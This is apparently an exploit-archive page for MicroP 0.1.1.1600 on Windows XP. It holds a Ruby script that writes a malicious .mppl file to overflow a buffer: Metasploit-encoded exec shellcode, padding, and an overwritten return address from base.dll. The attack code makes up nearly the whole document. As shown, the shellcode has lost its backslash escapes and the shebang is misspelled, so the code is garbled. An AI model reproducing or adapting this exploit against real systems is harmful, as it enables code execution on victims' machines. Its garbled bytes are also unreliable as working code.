MicroP malicious mppl Buffer Overflow

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MicroP malicious mppl Buffer Overflow
# Published : 2010-08-23
# Author : James Fitts
# Previous Title : MS Excel Malformed FEATHEADER Record Exploit (MS09-067)
# Next Title : VLC Media Player DLL Hijacking

# Exploit Title: MicroP malicious MPPL Buffer Overflow
# Date: 08/23/10
# Author: james [AT] learnsecurityonline [DOT] com
# Software Link: http://sourceforge.net/projects/microp/
# Version: 0.1.1.1600
# Tested on: Windows XP SP3 EN

#! /usr/bin/evn ruby


# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
boom =      "xdbxc0x31xc9xbfx7cx16x70"
boom << "xccxd9x74x24xf4xb1x1ex58x31"
boom << "x78x18x83xe8xfcx03x78x68xf4"
boom << "x85x30x78xbcx65xc9x78xb6x23"
boom << "xf5xf3xb4xaex7dx02xaax3ax32"
boom << "x1cxbfx62xedx1dx54xd5x66x29"
boom << "x21xe7x96x60xf5x71xcax06x35"
boom << "xf5x14xc7x7cxfbx1bx05x6bxf0"
boom << "x27xddx48xfdx22x38x1bxa2xe8"
boom << "xc3xf7x3bx7axcfx4cx4fx23xd3"
boom << "x53xa4x57xf7xd8x3bx83x8ex83"
boom << "x1fx57x53x64x51xa1x33xcdxf5"
boom << "xc6xf5xc1x7ex98xf5xaaxf1x05"
boom << "xa8x26x99x3dx3bxc0xd9xfex51"
boom << "x61xb6x0ex2fx85x19x87xb7x78"
boom << "x2fx59x90x7bxd7x05x7fxe8x7b"
boom << "xca"

spl0it = boom + "x42" * 1132

EIP = [0x10022b63].pack('V') # call eax from base.dll

File.open("exploit.mppl", 'w') do |b|
	b.write spl0it + EIP
end